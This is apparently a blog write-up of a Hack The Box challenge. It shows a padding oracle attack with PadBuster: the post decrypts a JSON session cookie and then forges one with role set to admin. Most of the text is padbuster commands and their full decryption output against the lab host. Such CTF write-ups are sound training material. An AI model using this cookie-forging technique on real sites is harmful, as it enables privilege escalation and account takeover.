-------------------------------------------------------------------------------------------------------------------
STEP 1
padbuster http://docker.hackthebox.eu:37742 zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D --cookies "PHPSESSID=7d5guetet0tj3o1kn8lrd77da0;iknowmag1k=zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D" 8 --encoding=0
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 256 302 0 profile.php
-------------------------------------------------------
padbuster http://docker.hackthebox.eu:37742/profile.php zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D --cookies "PHPSESSID=7d5guetet0tj3o1kn8lrd77da0;iknowmag1k=zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D" 8 --encoding=0
** Finished ***
After
STEP 1
padbuster http://docker.hackthebox.eu:37742 zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D --cookies "PHPSESSID=7d5guetet0tj3o1kn8lrd77da0;iknowmag1k=zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D" 8 --encoding=0
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 256 302 0 profile.php
-------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------
STEP 2padbuster http://docker.hackthebox.eu:37742/profile.php zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D --cookies "PHPSESSID=7d5guetet0tj3o1kn8lrd77da0;iknowmag1k=zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D" 8 --encoding=0
** Finished ***
[+] Decrypted value (ASCII): {"user":"bdmin","role":"user"}
[+] Decrypted value (HEX): 7B2275736572223A2262646D696E222C22726F6C65223A2275736572227D0202
[+] Decrypted value (Base64): eyJ1c2VyIjoiYmRtaW4iLCJyb2xlIjoidXNlciJ9AgI=
-----------------------------------------------------------------------------------------------------------------
STEP 3
padbuster http://docker.hackthebox.eu:37742/profile.php zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D --cookies "PHPSESSID=7d5guetet0tj3o1kn8lrd77da0;iknowmag1k=zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D" 8 --encoding=0 --plaintext "{\"user\":\"admin\",\"role\":\"admin\"}"
** Finished ***
[+] Encrypted value is: LDRCU61StZbYrdIXPROTGIprI45i7IsYMAovrw2IGp8AAAAAAAAAAA%3D%3D
------------------------------------------------------------------------------------------------------------------
STEP 4
We add the newly made encrypted value of "role=admin" to the cookies and we find the flag.
Before
After
========================================================================
Full manuscript
:~$ padbuster http://docker.hackthebox.eu:37742/profile.php zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D --cookies "PHPSESSID=7d5guetet0tj3o1kn8lrd77da0;iknowmag1k=zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D" 8 --encoding=0
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 3846
INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 4 ***
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 200 3846 N/A
2 ** 255 500 2203 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (188/256) [Byte 8]
[+] Success: (230/256) [Byte 7]
[+] Success: (10/256) [Byte 6]
[+] Success: (3/256) [Byte 5]
[+] Success: (10/256) [Byte 4]
[+] Success: (224/256) [Byte 3]
[+] Success: (226/256) [Byte 2]
[+] Success: (67/256) [Byte 1]
Block 1 Results:
[+] Cipher Text (HEX): 58c562c826efa7a0
[+] Intermediate Bytes (HEX): b51926f3f9f51845
[+] Plain Text: {"user":
Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 1.
*** Starting Block 2 of 4 ***
[+] Success: (115/256) [Byte 8]
[+] Success: (121/256) [Byte 7]
[+] Success: (126/256) [Byte 6]
[+] Success: (181/256) [Byte 5]
[+] Success: (96/256) [Byte 4]
[+] Success: (256/256) [Byte 3]
[+] Success: (96/256) [Byte 2]
[+] Success: (142/256) [Byte 1]
Block 2 Results:
[+] Cipher Text (HEX): 31a52fdbef978446
[+] Intermediate Bytes (HEX): 7aa706a54f81858c
[+] Plain Text: "bdmin",
*** Starting Block 3 of 4 ***
[+] Success: (155/256) [Byte 8]
[+] Success: (68/256) [Byte 7]
[+] Success: (74/256) [Byte 6]
[+] Success: (114/256) [Byte 5]
[+] Success: (78/256) [Byte 4]
[+] Success: (186/256) [Byte 3]
[+] Success: (48/256) [Byte 2]
[+] Success: (229/256) [Byte 1]
Block 3 Results:
[+] Cipher Text (HEX): 566e38a2cbe1617c
[+] Intermediate Bytes (HEX): 13d740b78ab5be64
[+] Plain Text: "role":"
*** Starting Block 4 of 4 ***
[+] Success: (129/256) [Byte 8]
[+] Success: (159/256) [Byte 7]
[+] Success: (97/256) [Byte 6]
[+] Success: (19/256) [Byte 5]
[+] Success: (43/256) [Byte 4]
[+] Success: (165/256) [Byte 3]
[+] Success: (230/256) [Byte 2]
[+] Success: (213/256) [Byte 1]
Block 4 Results:
[+] Cipher Text (HEX): 409071862aba0508
[+] Intermediate Bytes (HEX): 231d5dd0e99c637e
[+] Plain Text: user"}
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): {"user":"bdmin","role":"user"}
[+] Decrypted value (HEX): 7B2275736572223A2262646D696E222C22726F6C65223A2275736572227D0202
[+] Decrypted value (Base64): eyJ1c2VyIjoiYmRtaW4iLCJyb2xlIjoidXNlciJ9AgI=
No comments:
Post a Comment